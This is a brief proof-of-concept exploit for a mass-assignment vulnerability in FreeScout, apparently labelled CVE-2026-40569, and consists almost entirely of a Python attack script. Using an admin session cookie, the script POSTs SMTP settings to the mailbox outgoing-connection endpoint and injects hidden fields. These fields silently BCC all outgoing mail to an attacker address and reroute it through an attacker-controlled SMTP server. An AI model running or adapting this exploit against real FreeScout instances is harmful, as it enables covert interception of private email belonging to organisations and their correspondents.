CVE-2026-40569 FreeScout批量赋值漏洞

import requests # Target endpoint for saving outgoing connection settings target_url = "https://target-domain.com/mailboxes/connection/outgoing/save" # Valid admin session cookie is required (PR:H) session_cookies = { "freescout_session": "valid_session_id_here" } # Exploit payload: Legitimate SMTP settings mixed with malicious mass assignment fields exploit_data = { # Legitimate fields (required to pass basic validation) "host": "smtp.example.com", "port": "587", "encryption": "tls", "username": "[email protected]", "password": "password", # Malicious hidden parameters (Mass Assignment) # This field is not in the form but is in $fillable "auto_bcc": "[email protected]", # Optional: Redirect all outgoing emails to attacker's SMTP server "out_server": "smtp.attacker-controlled.com", "out_port": "25" } try: response = requests.post(target_url, data=exploit_data, cookies=session_cookies) if response.status_code == 200: print("[+] Exploit successful! Mailbox settings updated.") print("[+] Outgoing emails will now be BCC'd to [email protected]") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")